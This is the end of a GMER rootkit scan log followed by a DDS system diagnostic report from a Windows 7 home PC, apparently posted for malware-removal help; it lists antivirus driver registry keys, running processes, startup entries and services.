Reg      HKLM\SYSTEM\CurrentControlSet\services\aswSnx@DisplayName                                                                                                                                         aswSnx
Reg      HKLM\SYSTEM\CurrentControlSet\services\aswSnx@Group                                                                                                                                               FSFilter Virtualization
Reg      HKLM\SYSTEM\CurrentControlSet\services\aswSnx@DependOnService                                                                                                                                     FltMgr?
Reg      HKLM\SYSTEM\CurrentControlSet\services\aswSnx@Description                                                                                                                                         avast! virtualization driver (aswSnx)
Reg      HKLM\SYSTEM\CurrentControlSet\services\aswSnx@Tag                                                                                                                                                 2
Reg      HKLM\SYSTEM\CurrentControlSet\services\aswSnx\Instances                                                                                                                                           
Reg      HKLM\SYSTEM\CurrentControlSet\services\aswSnx\Instances@DefaultInstance                                                                                                                           aswSnx Instance
Reg      HKLM\SYSTEM\CurrentControlSet\services\aswSnx\Instances\aswSnx Instance                                                                                                                           
Reg      HKLM\SYSTEM\CurrentControlSet\services\aswSnx\Instances\aswSnx Instance@Altitude                                                                                                                  137600
Reg      HKLM\SYSTEM\CurrentControlSet\services\aswSnx\Instances\aswSnx Instance@Flags                                                                                                                     0
Reg      HKLM\SYSTEM\CurrentControlSet\services\aswSnx\Parameters                                                                                                                                          
Reg      HKLM\SYSTEM\CurrentControlSet\services\aswSnx\Parameters@ProgramFolder                                                                                                                            \DosDevices\C:\Program Files\AVAST Software\Avast
Reg      HKLM\SYSTEM\CurrentControlSet\services\aswSnx\Parameters@DataFolder                                                                                                                               \DosDevices\C:\ProgramData\AVAST Software\Avast
Reg      HKLM\SYSTEM\CurrentControlSet\services\aswSnx                                                                                                                                                     
Reg      HKLM\SYSTEM\CurrentControlSet\services\aswSP@Type                                                                                                                                                 1
Reg      HKLM\SYSTEM\CurrentControlSet\services\aswSP@Start                                                                                                                                                1
Reg      HKLM\SYSTEM\CurrentControlSet\services\aswSP@ErrorControl                                                                                                                                         1
Reg      HKLM\SYSTEM\CurrentControlSet\services\aswSP@DisplayName                                                                                                                                          aswSP
Reg      HKLM\SYSTEM\CurrentControlSet\services\aswSP@Description                                                                                                                                          avast! Self Protection
Reg      HKLM\SYSTEM\CurrentControlSet\services\aswSP\Parameters                                                                                                                                           
Reg      HKLM\SYSTEM\CurrentControlSet\services\aswSP\Parameters@BehavShield                                                                                                                               1
Reg      HKLM\SYSTEM\CurrentControlSet\services\aswSP\Parameters@ProgramFolder                                                                                                                             \DosDevices\C:\Program Files\AVAST Software\Avast
Reg      HKLM\SYSTEM\CurrentControlSet\services\aswSP\Parameters@DataFolder                                                                                                                                \DosDevices\C:\ProgramData\AVAST Software\Avast
Reg      HKLM\SYSTEM\CurrentControlSet\services\aswSP\Parameters@ProgramFilesFolder                                                                                                                        \DosDevices\C:\Program Files
Reg      HKLM\SYSTEM\CurrentControlSet\services\aswSP\Parameters@GadgetFolder                                                                                                                              \DosDevices\C:\Program Files\Windows Sidebar\Shared Gadgets\aswSidebar.gadget
Reg      HKLM\SYSTEM\CurrentControlSet\services\aswSP                                                                                                                                                      
Reg      HKLM\SYSTEM\CurrentControlSet\services\aswTdi@Type                                                                                                                                                1
Reg      HKLM\SYSTEM\CurrentControlSet\services\aswTdi@Start                                                                                                                                               1
Reg      HKLM\SYSTEM\CurrentControlSet\services\aswTdi@ErrorControl                                                                                                                                        1
Reg      HKLM\SYSTEM\CurrentControlSet\services\aswTdi@DisplayName                                                                                                                                         avast! Network Shield Support
Reg      HKLM\SYSTEM\CurrentControlSet\services\aswTdi@Group                                                                                                                                               PNP_TDI
Reg      HKLM\SYSTEM\CurrentControlSet\services\aswTdi@DependOnService                                                                                                                                     tcpip?
Reg      HKLM\SYSTEM\CurrentControlSet\services\aswTdi@Description                                                                                                                                         avast! Network Shield TDI driver
Reg      HKLM\SYSTEM\CurrentControlSet\services\aswTdi@Tag                                                                                                                                                 12
Reg      HKLM\SYSTEM\CurrentControlSet\services\aswTdi                                                                                                                                                     
Reg      HKLM\SYSTEM\CurrentControlSet\services\aswVmm@Type                                                                                                                                                1
Reg      HKLM\SYSTEM\CurrentControlSet\services\aswVmm@Start                                                                                                                                               3
Reg      HKLM\SYSTEM\CurrentControlSet\services\aswVmm@ErrorControl                                                                                                                                        1
Reg      HKLM\SYSTEM\CurrentControlSet\services\aswVmm@DisplayName                                                                                                                                         aswVmm
Reg      HKLM\SYSTEM\CurrentControlSet\services\aswVmm@Description                                                                                                                                         avast! VM Monitor
Reg      HKLM\SYSTEM\CurrentControlSet\services\aswVmm\Parameters                                                                                                                                          
Reg      HKLM\SYSTEM\CurrentControlSet\services\aswVmm                                                                                                                                                     
Reg      HKLM\SYSTEM\CurrentControlSet\services\avast! Antivirus@Type                                                                                                                                      32
Reg      HKLM\SYSTEM\CurrentControlSet\services\avast! Antivirus@Start                                                                                                                                     2
Reg      HKLM\SYSTEM\CurrentControlSet\services\avast! Antivirus@ErrorControl                                                                                                                              1
Reg      HKLM\SYSTEM\CurrentControlSet\services\avast! Antivirus@ImagePath                                                                                                                                 "C:\Program Files\AVAST Software\Avast\AvastSvc.exe"
Reg      HKLM\SYSTEM\CurrentControlSet\services\avast! Antivirus@DisplayName                                                                                                                               avast! Antivirus
Reg      HKLM\SYSTEM\CurrentControlSet\services\avast! Antivirus@Group                                                                                                                                     ShellSvcGroup
Reg      HKLM\SYSTEM\CurrentControlSet\services\avast! Antivirus@DependOnService                                                                                                                           aswMonFlt?RpcSS?
Reg      HKLM\SYSTEM\CurrentControlSet\services\avast! Antivirus@WOW64                                                                                                                                     1
Reg      HKLM\SYSTEM\CurrentControlSet\services\avast! Antivirus@ObjectName                                                                                                                                LocalSystem
Reg      HKLM\SYSTEM\CurrentControlSet\services\avast! Antivirus@ServiceSidType                                                                                                                            1
Reg      HKLM\SYSTEM\CurrentControlSet\services\avast! Antivirus@Description                                                                                                                               Manages and implements avast! antivirus services for this computer. This includes the resident protection, the virus chest and the scheduler.
Reg      HKLM\SYSTEM\CurrentControlSet\services\avast! Antivirus                                                                                                                                           
Reg      HKLM\SYSTEM\ControlSet002\services\aswFsBlk@Type                                                                                                                                                  2
Reg      HKLM\SYSTEM\ControlSet002\services\aswFsBlk@Start                                                                                                                                                 2
Reg      HKLM\SYSTEM\ControlSet002\services\aswFsBlk@ErrorControl                                                                                                                                          1
Reg      HKLM\SYSTEM\ControlSet002\services\aswFsBlk@DisplayName                                                                                                                                           aswFsBlk
Reg      HKLM\SYSTEM\ControlSet002\services\aswFsBlk@Group                                                                                                                                                 FSFilter Activity Monitor
Reg      HKLM\SYSTEM\ControlSet002\services\aswFsBlk@DependOnService                                                                                                                                       FltMgr?
Reg      HKLM\SYSTEM\ControlSet002\services\aswFsBlk@Description                                                                                                                                           avast! mini-filter driver (aswFsBlk)
Reg      HKLM\SYSTEM\ControlSet002\services\aswFsBlk@Tag                                                                                                                                                   3
Reg      HKLM\SYSTEM\ControlSet002\services\aswFsBlk\Instances (not active ControlSet)                                                                                                                     
Reg      HKLM\SYSTEM\ControlSet002\services\aswFsBlk\Instances@DefaultInstance                                                                                                                             aswFsBlk Instance
Reg      HKLM\SYSTEM\ControlSet002\services\aswFsBlk\Instances\aswFsBlk Instance (not active ControlSet)                                                                                                   
Reg      HKLM\SYSTEM\ControlSet002\services\aswFsBlk\Instances\aswFsBlk Instance@Altitude                                                                                                                  388400
Reg      HKLM\SYSTEM\ControlSet002\services\aswFsBlk\Instances\aswFsBlk Instance@Flags                                                                                                                     0
Reg      HKLM\SYSTEM\ControlSet002\services\aswMonFlt@Type                                                                                                                                                 2
Reg      HKLM\SYSTEM\ControlSet002\services\aswMonFlt@Start                                                                                                                                                2
Reg      HKLM\SYSTEM\ControlSet002\services\aswMonFlt@ErrorControl                                                                                                                                         1
Reg      HKLM\SYSTEM\ControlSet002\services\aswMonFlt@ImagePath                                                                                                                                            \??\C:\Windows\system32\drivers\aswMonFlt.sys
Reg      HKLM\SYSTEM\ControlSet002\services\aswMonFlt@DisplayName                                                                                                                                          aswMonFlt
Reg      HKLM\SYSTEM\ControlSet002\services\aswMonFlt@Group                                                                                                                                                FSFilter Anti-Virus
Reg      HKLM\SYSTEM\ControlSet002\services\aswMonFlt@DependOnService                                                                                                                                      FltMgr?
Reg      HKLM\SYSTEM\ControlSet002\services\aswMonFlt@Description                                                                                                                                          avast! mini-filter driver (aswMonFlt)
Reg      HKLM\SYSTEM\ControlSet002\services\aswMonFlt\Instances (not active ControlSet)                                                                                                                    
Reg      HKLM\SYSTEM\ControlSet002\services\aswMonFlt\Instances@DefaultInstance                                                                                                                            aswMonFlt Instance
Reg      HKLM\SYSTEM\ControlSet002\services\aswMonFlt\Instances\aswMonFlt Instance (not active ControlSet)                                                                                                 
Reg      HKLM\SYSTEM\ControlSet002\services\aswMonFlt\Instances\aswMonFlt Instance@Altitude                                                                                                                320700
Reg      HKLM\SYSTEM\ControlSet002\services\aswMonFlt\Instances\aswMonFlt Instance@Flags                                                                                                                   0
Reg      HKLM\SYSTEM\ControlSet002\services\aswRdr@Type                                                                                                                                                    1
Reg      HKLM\SYSTEM\ControlSet002\services\aswRdr@Start                                                                                                                                                   1
Reg      HKLM\SYSTEM\ControlSet002\services\aswRdr@ErrorControl                                                                                                                                            1
Reg      HKLM\SYSTEM\ControlSet002\services\aswRdr@DisplayName                                                                                                                                             aswRdr
Reg      HKLM\SYSTEM\ControlSet002\services\aswRdr@Group                                                                                                                                                   PNP_TDI
Reg      HKLM\SYSTEM\ControlSet002\services\aswRdr@DependOnService                                                                                                                                         tcpip?
Reg      HKLM\SYSTEM\ControlSet002\services\aswRdr@Description                                                                                                                                             avast! WFP Redirect driver
Reg      HKLM\SYSTEM\ControlSet002\services\aswRdr@ImagePath                                                                                                                                               \SystemRoot\System32\Drivers\aswrdr2.sys
Reg      HKLM\SYSTEM\ControlSet002\services\aswRdr\Parameters (not active ControlSet)                                                                                                                      
Reg      HKLM\SYSTEM\ControlSet002\services\aswRdr\Parameters@MSIgnoreLSPDefault                                                                                                                           
Reg      HKLM\SYSTEM\ControlSet002\services\aswRdr\Parameters@WSIgnoreLSPDefault                                                                                                                           nl_lsp.dll,imon.dll,xfire_lsp.dll,mslsp.dll,mssplsp.dll,cwhook.dll,spi.dll,bmnet.dll,winsflt.dll
Reg      HKLM\SYSTEM\ControlSet002\services\aswRvrt@Type                                                                                                                                                   1
Reg      HKLM\SYSTEM\ControlSet002\services\aswRvrt@Start                                                                                                                                                  0
Reg      HKLM\SYSTEM\ControlSet002\services\aswRvrt@ErrorControl                                                                                                                                           1
Reg      HKLM\SYSTEM\ControlSet002\services\aswRvrt@DisplayName                                                                                                                                            aswRvrt
Reg      HKLM\SYSTEM\ControlSet002\services\aswRvrt@Description                                                                                                                                            avast! Revert
Reg      HKLM\SYSTEM\ControlSet002\services\aswRvrt\Parameters (not active ControlSet)                                                                                                                     
Reg      HKLM\SYSTEM\ControlSet002\services\aswRvrt\Parameters@BootCounter                                                                                                                                 14
Reg      HKLM\SYSTEM\ControlSet002\services\aswRvrt\Parameters@TickCounter                                                                                                                                 3373043
Reg      HKLM\SYSTEM\ControlSet002\services\aswRvrt\Parameters@SystemRoot                                                                                                                                  \Device\Harddisk0\Partition3\Windows
Reg      HKLM\SYSTEM\ControlSet002\services\aswRvrt\Parameters@ImproperShutdown                                                                                                                            1
Reg      HKLM\SYSTEM\ControlSet002\services\aswSnx@Type                                                                                                                                                    2
Reg      HKLM\SYSTEM\ControlSet002\services\aswSnx@Start                                                                                                                                                   1
Reg      HKLM\SYSTEM\ControlSet002\services\aswSnx@ErrorControl                                                                                                                                            1
Reg      HKLM\SYSTEM\ControlSet002\services\aswSnx@DisplayName                                                                                                                                             aswSnx
Reg      HKLM\SYSTEM\ControlSet002\services\aswSnx@Group                                                                                                                                                   FSFilter Virtualization
Reg      HKLM\SYSTEM\ControlSet002\services\aswSnx@DependOnService                                                                                                                                         FltMgr?
Reg      HKLM\SYSTEM\ControlSet002\services\aswSnx@Description                                                                                                                                             avast! virtualization driver (aswSnx)
Reg      HKLM\SYSTEM\ControlSet002\services\aswSnx@Tag                                                                                                                                                     2
Reg      HKLM\SYSTEM\ControlSet002\services\aswSnx\Instances (not active ControlSet)                                                                                                                       
Reg      HKLM\SYSTEM\ControlSet002\services\aswSnx\Instances@DefaultInstance                                                                                                                               aswSnx Instance
Reg      HKLM\SYSTEM\ControlSet002\services\aswSnx\Instances\aswSnx Instance (not active ControlSet)                                                                                                       
Reg      HKLM\SYSTEM\ControlSet002\services\aswSnx\Instances\aswSnx Instance@Altitude                                                                                                                      137600
Reg      HKLM\SYSTEM\ControlSet002\services\aswSnx\Instances\aswSnx Instance@Flags                                                                                                                         0
Reg      HKLM\SYSTEM\ControlSet002\services\aswSnx\Parameters (not active ControlSet)                                                                                                                      
Reg      HKLM\SYSTEM\ControlSet002\services\aswSnx\Parameters@ProgramFolder                                                                                                                                \DosDevices\C:\Program Files\AVAST Software\Avast
Reg      HKLM\SYSTEM\ControlSet002\services\aswSnx\Parameters@DataFolder                                                                                                                                   \DosDevices\C:\ProgramData\AVAST Software\Avast
Reg      HKLM\SYSTEM\ControlSet002\services\aswSP@Type                                                                                                                                                     1
Reg      HKLM\SYSTEM\ControlSet002\services\aswSP@Start                                                                                                                                                    1
Reg      HKLM\SYSTEM\ControlSet002\services\aswSP@ErrorControl                                                                                                                                             1
Reg      HKLM\SYSTEM\ControlSet002\services\aswSP@DisplayName                                                                                                                                              aswSP
Reg      HKLM\SYSTEM\ControlSet002\services\aswSP@Description                                                                                                                                              avast! Self Protection
Reg      HKLM\SYSTEM\ControlSet002\services\aswSP\Parameters (not active ControlSet)                                                                                                                       
Reg      HKLM\SYSTEM\ControlSet002\services\aswSP\Parameters@BehavShield                                                                                                                                   1
Reg      HKLM\SYSTEM\ControlSet002\services\aswSP\Parameters@ProgramFolder                                                                                                                                 \DosDevices\C:\Program Files\AVAST Software\Avast
Reg      HKLM\SYSTEM\ControlSet002\services\aswSP\Parameters@DataFolder                                                                                                                                    \DosDevices\C:\ProgramData\AVAST Software\Avast
Reg      HKLM\SYSTEM\ControlSet002\services\aswSP\Parameters@ProgramFilesFolder                                                                                                                            \DosDevices\C:\Program Files
Reg      HKLM\SYSTEM\ControlSet002\services\aswSP\Parameters@GadgetFolder                                                                                                                                  \DosDevices\C:\Program Files\Windows Sidebar\Shared Gadgets\aswSidebar.gadget
Reg      HKLM\SYSTEM\ControlSet002\services\aswTdi@Type                                                                                                                                                    1
Reg      HKLM\SYSTEM\ControlSet002\services\aswTdi@Start                                                                                                                                                   1
Reg      HKLM\SYSTEM\ControlSet002\services\aswTdi@ErrorControl                                                                                                                                            1
Reg      HKLM\SYSTEM\ControlSet002\services\aswTdi@DisplayName                                                                                                                                             avast! Network Shield Support
Reg      HKLM\SYSTEM\ControlSet002\services\aswTdi@Group                                                                                                                                                   PNP_TDI
Reg      HKLM\SYSTEM\ControlSet002\services\aswTdi@DependOnService                                                                                                                                         tcpip?
Reg      HKLM\SYSTEM\ControlSet002\services\aswTdi@Description                                                                                                                                             avast! Network Shield TDI driver
Reg      HKLM\SYSTEM\ControlSet002\services\aswTdi@Tag                                                                                                                                                     12
Reg      HKLM\SYSTEM\ControlSet002\services\aswVmm@Type                                                                                                                                                    1
Reg      HKLM\SYSTEM\ControlSet002\services\aswVmm@Start                                                                                                                                                   3
Reg      HKLM\SYSTEM\ControlSet002\services\aswVmm@ErrorControl                                                                                                                                            1
Reg      HKLM\SYSTEM\ControlSet002\services\aswVmm@DisplayName                                                                                                                                             aswVmm
Reg      HKLM\SYSTEM\ControlSet002\services\aswVmm@Description                                                                                                                                             avast! VM Monitor
Reg      HKLM\SYSTEM\ControlSet002\services\aswVmm\Parameters (not active ControlSet)                                                                                                                      
Reg      HKLM\SYSTEM\ControlSet002\services\avast! Antivirus@Type                                                                                                                                          32
Reg      HKLM\SYSTEM\ControlSet002\services\avast! Antivirus@Start                                                                                                                                         2
Reg      HKLM\SYSTEM\ControlSet002\services\avast! Antivirus@ErrorControl                                                                                                                                  1
Reg      HKLM\SYSTEM\ControlSet002\services\avast! Antivirus@ImagePath                                                                                                                                     "C:\Program Files\AVAST Software\Avast\AvastSvc.exe"
Reg      HKLM\SYSTEM\ControlSet002\services\avast! Antivirus@DisplayName                                                                                                                                   avast! Antivirus
Reg      HKLM\SYSTEM\ControlSet002\services\avast! Antivirus@Group                                                                                                                                         ShellSvcGroup
Reg      HKLM\SYSTEM\ControlSet002\services\avast! Antivirus@DependOnService                                                                                                                               aswMonFlt?RpcSS?
Reg      HKLM\SYSTEM\ControlSet002\services\avast! Antivirus@WOW64                                                                                                                                         1
Reg      HKLM\SYSTEM\ControlSet002\services\avast! Antivirus@ObjectName                                                                                                                                    LocalSystem
Reg      HKLM\SYSTEM\ControlSet002\services\avast! Antivirus@ServiceSidType                                                                                                                                1
Reg      HKLM\SYSTEM\ControlSet002\services\avast! Antivirus@Description                                                                                                                                   Manages and implements avast! antivirus services for this computer. This includes the resident protection, the virus chest and the scheduler.
Reg      HKCU\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Compatibility Assistant\Persisted@C:\Users\Vincent\AppData\Local\Logitech® Webcam Software\Logishrd\LU2.0\LogitechUpdate.exe  1

---- EOF - GMER 2.1 ----


=========== dds.txt ===========

DDS (Ver_2012-11-20.01) - NTFS_AMD64 
Internet Explorer: 10.0.9200.16576
Run by Vincent at 21:44:22 on 2013-05-17
Microsoft Windows 7 Home Premium   6.1.7601.1.1252.1.1033.18.5943.4078 [GMT -5:00]
.
AV: avast! Antivirus *Disabled/Updated* {2B2D1395-420B-D5C9-657E-930FE358FC3C}
SP: avast! Antivirus *Disabled/Updated* {904CF271-6431-DA47-5FCE-A87D98DFB681}
SP: Windows Defender *Enabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
.
============== Running Processes ===============
.
C:\Windows\system32\lsm.exe
C:\Windows\system32\svchost.exe -k DcomLaunch
C:\Windows\system32\svchost.exe -k RPCSS
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
C:\Windows\system32\svchost.exe -k LocalService
C:\Windows\system32\svchost.exe -k netsvcs
C:\Program Files\Dell\DellDock\DockLogin.exe
C:\Windows\system32\svchost.exe -k NetworkService
C:\Program Files\AVAST Software\Avast\AvastSvc.exe
C:\Windows\System32\spoolsv.exe
C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
C:\Windows\system32\taskhost.exe
C:\Windows\system32\Dwm.exe
C:\Windows\Explorer.EXE
C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
C:\Program Files\Bonjour\mDNSResponder.exe
C:\Program Files (x86)\Common Files\Portrait Displays\Shared\DTSRVC.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation
C:\Program Files (x86)\Malwarebytes' Anti-Malware\mbamscheduler.exe
C:\Program Files (x86)\Malwarebytes' Anti-Malware\mbamservice.exe
C:\Program Files (x86)\Common Files\Portrait Displays\Drivers\pdisrvc.exe
C:\Program Files (x86)\Malwarebytes' Anti-Malware\mbamgui.exe
C:\Program Files (x86)\Secunia\PSI\PSIA.exe
C:\Windows\system32\svchost.exe -k imgsvc
C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSvcM.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted
C:\Windows\System32\WUDFHost.exe
C:\Program Files (x86)\Secunia\PSI\sua.exe
C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
C:\Windows\System32\hkcmd.exe
C:\Windows\System32\igfxpers.exe
C:\Program Files\Microsoft Device Center\itype.exe
C:\Program Files\Microsoft Device Center\ipoint.exe
C:\Program Files (x86)\Secunia\PSI\psi_tray.exe
C:\Program Files\Dell\DellDock\DellDock.exe
C:\Program Files (x86)\Multimedia Card Reader(9106)\ShwiconXP9106.exe
C:\Program Files (x86)\CyberLink\PowerDVD DX\PDVDDXSrv.exe
C:\Program Files (x86)\Roxio\Roxio Burn\RoxioBurnLauncher.exe
C:\Program Files\AVAST Software\Avast\AvastUI.exe
C:\Program Files (x86)\Logitech\LWS\Webcam Software\LWS.exe
C:\Program Files (x86)\Acer Display\eDisplay Management\DTHtml.exe
C:\Program Files (x86)\iTunes\iTunesHelper.exe
C:\Program Files (x86)\AirPort\APAgent.exe
C:\Program Files (x86)\Logitech\LWS\Webcam Software\CameraHelperShell.exe
C:\Program Files (x86)\Common Files\Portrait Displays\Shared\HookManager.exe
C:\Windows\system32\SearchIndexer.exe
C:\Program Files\iPod\bin\iPodService.exe
C:\Program Files (x86)\Common Files\Portrait Displays\Drivers\pdiSdkHelperx64.exe
C:\Program Files (x86)\Portrait Displays\Pivot Pro Plugin\wpctrl.exe
C:\Program Files (x86)\Portrait Displays\Pivot Pro Plugin\floater.exe
C:\Program Files (x86)\Common Files\Logishrd\LQCVFX\COCIManager.exe
C:\Windows\system32\igfxsrvc.exe
C:\Windows\system32\igfxext.exe
C:\Windows\System32\svchost.exe -k secsvcs
C:\Program Files\Windows Media Player\wmpnetwk.exe
C:\Windows\system32\wbem\wmiprvse.exe
C:\Users\Vincent\AppData\Local\Google\Chrome\Application\chrome.exe
C:\Users\Vincent\AppData\Local\Google\Chrome\Application\chrome.exe
C:\Users\Vincent\AppData\Local\Google\Chrome\Application\chrome.exe
C:\Users\Vincent\AppData\Local\Google\Chrome\Application\chrome.exe
C:\Windows\system32\wuauclt.exe
C:\Windows\SysWOW64\ctfmon.exe
C:\Windows\system32\SearchProtocolHost.exe
C:\Windows\system32\SearchFilterHost.exe
C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\System32\cscript.exe
.
============== Pseudo HJT Report ===============
.
uURLSearchHooks: {2e9331d0-b42b-42b7-9824-a6545d0ceaa6} - &lt;orphaned&gt;
mWinlogon: Userinit = userinit.exe,
BHO: {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - &lt;orphaned&gt;
BHO: avast! WebRep: {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} - C:\Program Files\AVAST Software\Avast\aswWebRepIE.dll
BHO: Windows Live ID Sign-in Helper: {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll
BHO: Java(tm) Plug-In 2 SSV Helper: {DBC80044-A445-435b-BC74-9C25C1C588A9} - 
TB: avast! WebRep: {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} - C:\Program Files\AVAST Software\Avast\aswWebRepIE.dll
uRun: [Google Update] "C:\Users\Vincent\AppData\Local\Google\Update\GoogleUpdate.exe" /c
mRun: [ShwiconXP9106] C:\Program Files (x86)\Multimedia Card Reader(9106)\ShwiconXP9106.exe
mRun: [PDVDDXSrv] "C:\Program Files (x86)\CyberLink\PowerDVD DX\PDVDDXSrv.exe"
mRun: [Desktop Disc Tool] "c:\Program Files (x86)\Roxio\Roxio Burn\RoxioBurnLauncher.exe"
mRun: [PivotSoftware] "C:\Program Files (x86)\Portrait Displays\Pivot Pro Plugin\Pivot_startup.exe" -delay=10
mRun: [DT ACR] C:\Program Files (x86)\Common Files\Portrait Displays\Shared\DT_startup.exe -ACR
mRun: [avast] "C:\Program Files\AVAST Software\Avast\avastUI.exe" /nogui
mRun: [APSDaemon] "C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe"
mRun: [LWS] C:\Program Files (x86)\Logitech\LWS\Webcam Software\LWS.exe -hide
mRun: [QuickTime Task] "C:\Program Files (x86)\QuickTime\QTTask.exe" -atboottime
mRun: [iTunesHelper] "C:\Program Files (x86)\iTunes\iTunesHelper.exe"
mRun: [AirPort Base Station Agent] "C:\Program Files (x86)\AirPort\APAgent.exe"
mRun: [Adobe ARM] "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe"
StartupFolder: C:\Users\Vincent\AppData\Roaming\MICROS~1\Windows\STARTM~1\Programs\Startup\DELLDO~1.LNK - C:\Program Files\Dell\DellDock\DellDock.exe
StartupFolder: C:\PROGRA~3\MICROS~1\Windows\STARTM~1\Programs\Startup\SECUNI~1.LNK - C:\Program Files (x86)\Secunia\PSI\psi_tray.exe
uPolicies-Explorer: NoDriveTypeAutoRun = dword:145
IE: {219C3416-8CB2-491a-A3C7-D9FCDDC9D600} - {5F7B1267-94A9-47F5-98DB-E99415F33AEC} - C:\Program Files (x86)\Windows Live\Writer\WriterBrowserExtension.dll
TCP: NameServer = 209.18.47.61 209.18.47.62
TCP: Interfaces\{7B6E9E3E-35B2-4192-9038-6C2AABAE4735} : DHCPNameServer = 209.18.47.61 209.18.47.62
Handler: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\Program Files (x86)\Common Files\Skype\Skype4COM.dll
Handler: wlpg - {E43EF6CD-A37A-4A9B-9E6F-83F89B8E6324} - C:\Program Files (x86)\Windows Live\Photo Gallery\AlbumDownloadProtocolHandler.dll
SSODL: WebCheck - &lt;orphaned&gt;
x64-BHO: avast! WebRep: {318A227B-5E9F-45bd-8999-7F8F10CA4CF5} - C:\Program Files\AVAST Software\Avast\aswWebRepIE64.dll
x64-BHO: Java(tm) Plug-In SSV Helper: {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre6\bin\ssv.dll
x64-BHO: Windows Live ID Sign-in Helper: {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll
x64-BHO: Java(tm) Plug-In 2 SSV Helper: {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files\Java\jre6\bin\jp2ssv.dll
x64-TB: avast! WebRep: {318A227B-5E9F-45bd-8999-7F8F10CA4CF5} - C:\Program Files\AVAST Software\Avast\aswWebRepIE64.dll
x64-Run: [RtHDVCpl] C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe -s
x64-Run: [IgfxTray] C:\Windows\System32\igfxtray.exe
x64-Run: [HotKeysCmds] C:\Windows\System32\hkcmd.exe
x64-Run: [Persistence] C:\Windows\System32\igfxpers.exe
x64-Run: [IntelliType Pro] "c:\Program Files\Microsoft Device Center\itype.exe"
x64-Run: [IntelliPoint] "c:\Program Files\Microsoft Device Center\ipoint.exe"
x64-DPF: {8AD9C840-044E-11D1-B3E9-00805F499D93} - hxxp://java.sun.com/update/1.6.0/jinstall-1_6_0_45-windows-i586.cab
x64-DPF: {CAFEEFAC-0016-0000-0045-ABCDEFFEDCBA} - hxxp://java.sun.com/update/1.6.0/jinstall-1_6_0_45-windows-i586.cab
x64-DPF: {CAFEEFAC-FFFF-FFFF-FFFF-ABCDEFFEDCBA} - hxxp://java.sun.com/update/1.6.0/jinstall-1_6_0_45-windows-i586.cab
x64-Handler: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - &lt;orphaned&gt;
x64-Handler: wlpg - {E43EF6CD-A37A-4A9B-9E6F-83F89B8E6324} - &lt;orphaned&gt;
x64-Notify: igfxcui - igfxdev.dll
x64-SSODL: WebCheck - &lt;orphaned&gt;
.
============= SERVICES / DRIVERS ===============
.
R0 aswRvrt;aswRvrt;C:\Windows\System32\drivers\aswRvrt.sys [2013-4-1 65336]
R0 PxHlpa64;PxHlpa64;C:\Windows\System32\drivers\PxHlpa64.sys [2010-11-30 55280]
R1 aswSnx;aswSnx;C:\Windows\System32\drivers\aswSnx.sys [2011-10-12 1025808]
R1 aswSP;aswSP;C:\Windows\System32\drivers\aswSP.sys [2011-10-12 377920]
R2 aswFsBlk;aswFsBlk;C:\Windows\System32\drivers\aswFsBlk.sys [2011-10-12 33400]
R2 aswMonFlt;aswMonFlt;C:\Windows\System32\drivers\aswMonFlt.sys [2011-10-12 80816]
R2 avast! Antivirus;avast! Antivirus;C:\Program Files\AVAST Software\Avast\AvastSvc.exe [2013-4-1 45248]
R2 DockLoginService;Dock Login Service;C:\Program Files\Dell\DellDock\DockLogin.exe [2009-6-9 155648]
R2 MBAMScheduler;MBAMScheduler;C:\Program Files (x86)\Malwarebytes' Anti-Malware\mbamscheduler.exe [2013-5-17 418376]
R2 MBAMService;MBAMService;C:\Program Files (x86)\Malwarebytes' Anti-Malware\mbamservice.exe [2013-5-17 701512]
R2 PdiService;Portrait Displays SDK Service;C:\Program Files (x86)\Common Files\Portrait Displays\Drivers\pdisrvc.exe [2011-6-25 109168]
R2 Secunia PSI Agent;Secunia PSI Agent;C:\Program Files (x86)\Secunia\PSI\psia.exe [2011-1-10 993848]
R2 Secunia Update Agent;Secunia Update Agent;C:\Program Files (x86)\Secunia\PSI\sua.exe [2011-1-10 399416]
R3 HECIx64;Intel(R) Management Engine Interface;C:\Windows\System32\drivers\HECIx64.sys [2010-11-30 56344]
R3 IntcDAud;Intel(R) Display Audio;C:\Windows\System32\drivers\IntcDAud.sys [2010-11-30 271872]
R3 k57nd60a;Broadcom NetLink (TM) Gigabit Ethernet - NDIS 6.0;C:\Windows\System32\drivers\k57nd60a.sys [2010-11-30 321064]
R3 MBAMProtector;MBAMProtector;C:\Windows\System32\drivers\mbam.sys [2013-5-17 25928]
R3 PSI;PSI;C:\Windows\System32\drivers\psi_mf.sys [2010-9-1 17976]
S2 clr_optimization_v4.0.30319_32;Microsoft .NET Framework NGEN v4.0.30319_X86;C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe [2010-3-18 130384]
